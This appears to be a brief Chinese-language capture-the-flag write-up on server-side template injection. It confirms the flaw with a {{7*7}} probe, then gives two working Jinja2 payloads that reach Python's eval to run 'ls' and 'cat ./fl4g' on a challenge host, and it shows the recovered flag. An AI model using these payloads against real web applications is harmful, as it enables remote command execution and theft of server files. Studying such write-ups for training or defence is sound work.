模板注入
在url后访问地址/{
{7*7}}
返回49
于是是模板注入
payload:
http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{
{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% endif %}{% endfor %}
URL http://111.200.241.244:52204/fl4g index.py not found
http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{
{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat ./fl4g').read()") }}{% endif %}{% endfor %}
URL http://111.200.241.244:52204/ctf{f22b6844-5169-4054-b2a0-d95b9361cb57} not found